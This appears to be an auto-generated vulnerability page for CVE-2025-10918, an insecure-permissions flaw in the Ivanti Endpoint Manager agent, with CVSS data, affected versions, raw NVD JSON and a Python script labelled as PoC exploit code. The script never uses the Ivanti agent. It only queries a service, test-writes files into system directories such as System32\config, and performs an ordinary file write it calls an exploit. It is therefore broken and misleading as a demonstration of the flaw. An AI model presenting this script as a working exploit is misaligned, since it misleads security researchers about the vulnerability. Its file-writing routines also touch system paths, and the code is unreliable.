Security Vulnerability Report
中文
CVE-2025-10918 CVSS 7.1 HIGH

CVE-2025-10918

Published: 2025-11-11 16:15:38
Last Modified: 2025-11-17 19:29:21
Source: 3c1d8aa1-5a33-4ea4-8992-aadd6440af75

Description

Insecure default permissions in the agent of Ivanti Endpoint Manager before version 2024 SU4 allows a local authenticated attacker to write arbitrary files anywhere on disk

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ivanti:endpoint_manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ivanti:endpoint_manager:2024:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ivanti:endpoint_manager:2024:su1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ivanti:endpoint_manager:2024:su2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ivanti:endpoint_manager:2024:su3:*:*:*:*:*:* - VULNERABLE
Ivanti Endpoint Manager < 2024 SU4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-10918 PoC - Ivanti Endpoint Manager Insecure Default Permissions # This PoC demonstrates file write capability due to insecure permissions # Note: This is for educational and authorized testing purposes only import os import sys import subprocess def check_epm_service_status(): """Check if Ivanti Endpoint Manager service is running""" try: result = subprocess.run( ['sc', 'query', 'IvantiEndpointManager'], capture_output=True, text=True ) if 'RUNNING' in result.stdout: return True return False except Exception as e: print(f"[-] Error checking service: {e}") return False def check_insecure_permissions(target_path): """Check for insecure write permissions on target path""" try: # Attempt to create a test file in the target directory test_file = os.path.join(target_path, 'epm_test_file.txt') with open(test_file, 'w') as f: f.write('CVE-2025-10918 Test') print(f"[+] Successfully wrote to: {test_file}") # Clean up os.remove(test_file) return True except PermissionError: print(f"[-] Permission denied for: {target_path}") return False except Exception as e: print(f"[-] Error: {e}") return False def exploit_write_arbitrary_file(remote_path, content): """Exploit: Write arbitrary content to any path on disk""" try: with open(remote_path, 'w') as f: f.write(content) print(f"[+] Successfully wrote to arbitrary path: {remote_path}") return True except Exception as e: print(f"[-] Write failed: {e}") return False def main(): print("=" * 60) print("CVE-2025-10918 PoC - Ivanti EPM Insecure Default Permissions") print("=" * 60) if not check_epm_service_status(): print("[-] Ivanti Endpoint Manager service not running") sys.exit(1) print("[+] Ivanti Endpoint Manager service is running") # Test paths commonly affected by this vulnerability test_paths = [ 'C:\\Windows\\System32\\config\\', 'C:\\Program Files\\Ivanti\\', 'C:\\Windows\\Temp\\' ] for path in test_paths: print(f"\n[*] Testing permissions on: {path}") check_insecure_permissions(path) print("\n[*] For full exploitation, provide target path and content") print("[*] This vulnerability allows writing arbitrary files anywhere on disk") print("[*] Mitigation: Upgrade to Ivanti EPM 2024 SU4 or later") if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10918", "sourceIdentifier": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "published": "2025-11-11T16:15:38.113", "lastModified": "2025-11-17T19:29:20.863", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insecure default permissions in the agent of Ivanti Endpoint Manager before version 2024 SU4 allows a local authenticated attacker to write arbitrary files anywhere on disk"}], "metrics": {"cvssMetricV31": [{"source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-276"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:*:*:*:*:*:*:*:*", "versionEndExcluding": "2024", "matchCriteriaId": "7ABDE6FE-56CC-4A46-91F2-2F54C3EC6A75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:-:*:*:*:*:*:*", "matchCriteriaId": "6C7283FE-C10A-4E37-B004-15FB0CAC49A5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su1:*:*:*:*:*:*", "matchCriteriaId": "FC51EEA2-1C4C-4069-9704-7ACFE4773930"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su2:*:*:*:*:*:*", "matchCriteriaId": "E1EF5E1B-9377-49D3-9BE3-62FC78E666A3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su3:*:*:*:*:*:*", "matchCriteriaId": "749AADDA-834D-4EC0-B7FF-E136FD1984F7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su3_security_release_1:*:*:*:*:*:*", "matchCriteriaId": "698BF7A1-62A1-45B5-BF08-AB3F3AA0245C"}]}]}], "references": [{"url": "https://forums.ivanti.com/s/article/Security-Advisory-EPM-November-2025-for-EPM-2024?language=en_US", "source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.